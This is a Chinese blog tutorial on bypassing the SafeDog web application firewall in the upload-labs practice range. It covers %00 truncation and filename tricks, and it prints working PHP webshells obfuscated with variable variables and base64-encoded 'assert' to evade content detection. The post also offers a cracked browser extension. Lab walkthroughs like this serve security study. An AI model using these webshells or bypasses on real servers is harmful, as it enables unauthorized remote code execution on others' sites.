大型翻车现场，十种waf绕过姿势，仅成功一种

前言

文件上传基础篇：

upload-labs通关全教程（建议萌新收藏）Web安全-文件上传漏洞超详细解析

环境搭建

首先去官网下载安全狗，进行网站配置，或者后台回复【安全狗】，靶场源码和waf软件都准备好了，都是最新版本的，直接下载就行

image-20240719140734087

image-20240718104030558

安全狗配置文件防护规则

image-20240718103951676

这里用**「upload-labs」**中的第六关进行文件上传测试

image-20240720125729066

第六关是在文件后缀添加一个空格就可以上传成功

image-20240718112107859

waf环境已搭好

image-20240718110902299

WAF绕过

基于文件名称的绕过

%00截断

首先上传一个php文件，抓包文件后面添加;.jpg

image-20240718152245564

将;
的**「hex编码」替换为00，「造成00截断」**，如下效果

❝

知识扩展

%00截断是一种在文件上传或URL处理过程中常见的安全绕过技术，它利用了某些编程语言或系统在处理字符串时的一个特性：即当遇到空字符（null character，ASCII码为0，即\0
或%00
在URL编码中）时，会认为字符串已经结束，从而忽略了空字符之后的所有内容。

❞

7月18日

可以看到，虽然绕过了**「waf」**还是有代码红色警告没有上传成功，这个时候我们就可以在原来有代码漏洞的情况下，进行绕过，原来代码存在空格绕过，这里我们就用空格进行绕过，添加一个空格

image-20240718162542359

上传成功，点击查看源码，就可以看到文件上传的位置（这个图片的位置）

image-20240718162636761

多个等号

这个操作就更简单了，直接在文件名的位置把**「一个等于」换成「多个等于」，也能绕过WAF，此时再在「末尾加空格」**，直接成功上传，如下

image-20240720135548593

哈哈，没有成功，原文是这样写的，可能已经修复了

image-20240720135621668

基于内容拦截绕过

此时我们访问，这个php文件被拦截了，这就是**「基于内容的拦截」，像经常使用的「一句话木马」**都会被安全狗绕过

image-20240718162708072

[1].畸形传参木马

这里要用到**「hackerbox谷歌插件」**或者使用火狐浏览器，默认下载不是破解的，我准备好了破解版本，后台私信【hackbox】即可

<?php  
    $a = $_GET['x'];  
    $$a = $_GET['y'];  
    $b($_POST['z']);//调用 $b 变量所引用的函数，并将 $_POST['z'] 的值作为参数传递给它。  
   
?>

image-20240718171010670

我们所使用的一句话木马是市面上**「最为常见」的类型，因此几乎所有的WAF（Web应用防火墙）都能识别并拦截这段内容。这正是导致我们「上传后无法访问」**的根本原因。为了验证这一点，你可以尝试开启安全狗的木马扫描功能，看看它是否能被检测出来，从而判断其是否具备免杀能力。

image-20240718171355888

上图可以看到并没有检测到，用**「get方式」传如参数「x」和y，值分别为「b」和「assert*** ，再用」**POST方式*传如参数z，值为自己想执行的命令

image-20240718172741594

[2].经典编码木马

通过assert函数的base64编码后的拼接即可绕过，如下：

<?php  
$e=base64_decode("hellow小羽网安");  
$e($_POST['aa']);  
   
?>

免杀情况

image-20240718173634220

我们将中文放在了后面，此时出现拦截

image-20240718175622965

我放在前面试试，还是拦截

image-20240718175552240

穿插进去，就可以了，不知道是什么原理，php特性、base64编码检测，还是安全狗防护机制，有大佬路过指教一下，谢谢你

image-20240718175858301

执行成功

上面的绕过方式不可避免都有一些问题，那就是传参时使用了敏感关键字，比如**phpinfo()**之类的，有一些防火墙就会检测传入的参数是否含有敏感内容(例如宝塔)，那这时候我们怎么办呢？

我们可以把传参使用的敏感关键字变成其他编码格式，比如base64，再在一句话木马中对传入的参数先做一个解码操作，如下

在木马中添加解码操作

<?php  
   
$e=base64_decode("YX小羽网安NzZ公众号XJ0");  
   
$e(base64_decode($_POST['aa']));  
   
?>

image-20240718192250481

这个时候我们就可以将phpinfo拿去base64进行加密

image-20240718192501792

这个时候就可以执行php代码了，绕过了关键字的检测

image-20240718192453335

其他失败案例参考

「复写」

image-20240720140100835

失败

image-20240720140431290

「脏数据绕过」

image-20240720140121421

失败

image-20240720140334677

「修改为单引号」

image-20240720141030785

失败

image-20240720141130658

「去掉双引号」

image-20240720141224174

失败

image-20240720141247298

「.php放到引号的外面」

image-20240720141650023

上传成功，但是并没有这个php文件

image-20240720141633479

查看上传之后的文件，并不是php文件

image-20240720141852180

那不加后缀试试，显示文件内容，并没有执行

image-20240720141956246

所以使用蚁剑也连接不了

image-20240720142134501

「数据截断绕过-防匹配(; / 换行)」

image-20240720142300053

失败

image-20240720142319551

「参数多次」

失败

image-20240720142441707

总结

本教程通过实际搭建环境，展示了文件上传中WAF的多种绕过技巧，包括%00截断、畸形传参木马、经典编码木马
等。尽管部分绕过方法因WAF更新而失效，但实验过程揭示了安全机制与绕过技术的博弈。通过不断尝试与创新，攻击者总能找到新的突破点，而防御方则需持续更新策略以应对新威胁。这强调了持续安全监测与加固的重要性。

文章参考：

https://blog.csdn.net/qq\_63844103/article/details/128021707

https://blog.csdn.net/weixin\_62808713/article/details/128875157

网安学习不迷路，欢迎各位大佬加入讨论